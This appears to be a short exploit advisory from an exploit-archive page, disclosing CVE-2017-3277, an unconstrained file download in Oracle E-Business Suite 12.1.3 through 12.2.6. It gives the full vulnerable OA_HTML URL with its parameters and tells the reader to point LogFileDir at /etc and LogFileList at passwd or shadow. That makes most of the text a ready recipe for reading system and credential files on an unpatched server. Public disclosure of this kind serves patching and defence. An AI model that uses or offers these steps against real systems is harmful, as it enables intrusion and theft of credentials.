Home / os / winmobile

Oracle E-Business Suite 12.x Unconstrainted File Download

Posted on 23 January 2017

# Exploit Title: [Unconstrained File Download - Oracle E-Business Suite] # Exploit Discoverer: [Owais Mehtab, Tayeeb Rana] # Vendor Homepage: [http://www.oracle.com] # Version: [12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6] # CVE: 2017-3277 [Attack Vectors] exploitation may be done by sending a post request to following url http://example.com/OA_HTML/weboam/oam/patch/timing/ViewLogFiles$programRunId=8548$sessionId=231730$page*_session*_id=231730$utilityFlag=Completed$startDate=1472726192000$taskName=AutoPatch_20-_20u21444745.drv$lastUpdate=1472726297000$status=Completed$taskid=231730$taskId=231730$totalRunTime=1_20min,_2045_20sec$utilityName=adpatch$target=FINchange Change the following in post request:- 1-The LogFileDir parameter to any system directory (e.g., /etc) 2-The LogFileList:key:1 parameter value to the file name that needs to be downloaded (passwd or shadow)

 

TOP